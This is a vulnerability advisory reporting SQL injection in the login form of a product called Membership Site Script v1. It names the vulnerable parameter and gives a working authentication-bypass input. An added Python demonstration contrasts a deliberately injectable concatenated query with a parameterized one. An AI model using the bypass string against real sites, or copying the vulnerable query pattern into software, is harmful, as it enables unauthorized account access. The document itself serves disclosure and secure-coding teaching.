Membership Site Script 1 SQL Injection

2017.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################
#Title: Membership Site Script v1 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.turnkeycentral.com
#Vendor URL: http://www.turnkeycentral.com/scripts/membership-site-script/
#Product: Membership Site Script v1
#Google Dork: N/A
################################################
#
# Product & Service Introduction:
#
# "Membership Site Script"
# Do you want to Launch Your Own Membership Site That Grows Automatically on AutoPilot? With a membership site,
# your customers sign up and pay a monthly fee to gain access to special, private, members-only content.
# The content might be eBooks, scripts, articles, graphics, coaching audio or video - whatever you want.
#
# http://localhost/membershipscript/login.php
# submit=1&email=demo@gmail.com[SQL]&password=123456
#
#
# Authentication Bypass :
# http://localhost/membershipscript/login.php
# Username: test@test.com 'or''='
# Password: [empty]
#
# PoC:
# http://prnt.sc/en4u2s
# http://prnt.sc/en4tze
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################
--
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |
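Added example, not part of the original advisory and not the vendor's code: a login check built by string concatenation beside a parameterized one, run against the input quoted under "Authentication Bypass" above. The product is a PHP script whose query is not shown on the page, so the table, column names, query shape and sample row here are assumptions, with SQLite standing in for the real database.

```python
import hashlib
import hmac
import sqlite3

# Input string quoted in the advisory's "Authentication Bypass" section.
PAGE_INPUT = "test@test.com 'or''='"
DEMO_SALT = b"constructed-demo-salt"  # fixed salt only to keep the demo short


def hash_pw(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 100_000).hex()


def make_db():
    """In-memory database with one constructed member row (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.execute("INSERT INTO members (email, password) VALUES (?, ?)",
               ("test@test.com", hash_pw("s3cret-constructed")))
    return db


def login_vulnerable(db, email, password):
    # Assumed query shape: the email is pasted into the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM members WHERE password = '%s' AND email = '%s'"
           % (hash_pw(password), email))
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, email, password):
    # The email travels as a bound value and is never parsed as SQL; the
    # password check is done in code with a constant-time comparison.
    row = db.execute("SELECT password FROM members WHERE email = ?", (email,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], hash_pw(password))


if __name__ == "__main__":
    db = make_db()
    print("concatenated, page input :", login_vulnerable(db, PAGE_INPUT, ""))
    print("parameterized, page input:", login_parameterized(db, PAGE_INPUT, ""))
    print("parameterized, real creds:", login_parameterized(db, "test@test.com", "s3cret-constructed"))
```

In the concatenated version the WHERE clause becomes `(password = ... AND email = 'test@test.com ') OR '' = ''`, which is true for every row; with a bound parameter the same input is only an email address that matches no member.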

